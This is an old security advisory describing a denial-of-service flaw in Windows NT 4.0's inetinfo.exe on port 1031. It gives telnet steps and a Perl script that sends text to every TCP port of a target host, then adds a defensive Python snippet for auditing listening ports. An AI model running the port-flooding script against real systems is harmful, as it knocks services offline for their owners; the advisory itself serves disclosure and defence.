COMMAND
inetinfo.exe
SYSTEMS AFFECTED
Win NT 4.0
PROBLEM
Looks like NT is also vulnerable to exactly the same attack as the
one previously posted for port 135 (connecting and throwing garbage
at the port), this time on another port, namely 1031 (inetinfo).
The inetinfo.exe process goes insane on NT4.0.
To try, telnet to 1031 on an NT machine and type garbage, then
disconnect. Credit for this goes to Bob Beck.
Below is what Bob Beck and Chris Bayly rigged up to check.
#!/usr/local/bin/perl
# Connects to every TCP port on the target host and sends a line of text.
use Socket;
use FileHandle;
require "chat2.pl";

$ILoveBill = $ARGV[0] && shift;   # target host name
$verbose = 0;                     # tell me what you're hitting
$knownports = 0;                  # don't hit known problem ports

for ($port = 0; $port < 65535; $port++)
{
    # Skip the ports already known to be affected when $knownports is set
    if ($knownports && ($port == 135 || $port == 1031)) {
        next;
    }
    $fh = chat::open_port($ILoveBill, $port);
    chat::print ($fh, "Windows NT is the platform of the future");
    if ($verbose) {
        print "Trying port: $port\n\n";
    }
    chat::close($fh);
}
SOLUTION
Not available at this moment. Anyway, see if you need the
vulnerable ports. If you don't, GREAT, disable them!
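
To see whether the ports named above are actually listening on a host before deciding to disable or filter them, the following added example (not part of the original advisory) parses `netstat -an` output. It assumes the Windows-style column layout (Proto, Local Address, Foreign Address, State); the sample input is constructed, and the function name is hypothetical.

```python
# Added example: audit `netstat -an` output for the TCP ports named in this advisory.
import re

ADVISORY_PORTS = {135, 1031}  # ports named on this page

# Constructed sample in the Windows `netstat -an` layout (not captured from a real host).
SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1031           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1026         0.0.0.0:0              LISTENING
  TCP    10.0.0.5:1031          10.0.0.9:2044          ESTABLISHED
  UDP    0.0.0.0:135            *:*
"""

# TCP rows only: local address, local port, (foreign address skipped), state.
LINE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+(\S+)\s*$")


def exposed_listeners(netstat_text, ports=ADVISORY_PORTS):
    """Return sorted (port, local_addr, reachable_remotely) for TCP listeners on `ports`."""
    found = set()
    for line in netstat_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # headers, blank lines, UDP rows (no state column)
        addr, port, state = m.group(1), int(m.group(2)), m.group(3)
        if state.upper() != "LISTENING" or port not in ports:
            continue  # established sessions and unrelated ports are not listeners of interest
        # A listener bound to a loopback address cannot be reached from other hosts.
        found.add((port, addr, not addr.startswith("127.")))
    return sorted(found)


if __name__ == "__main__":
    for port, addr, remote in exposed_listeners(SAMPLE):
        scope = "reachable from the network" if remote else "loopback only"
        print(f"port {port} listening on {addr} ({scope})")
```

Any port reported as reachable from the network is a candidate for disabling the owning service or filtering the port at the border.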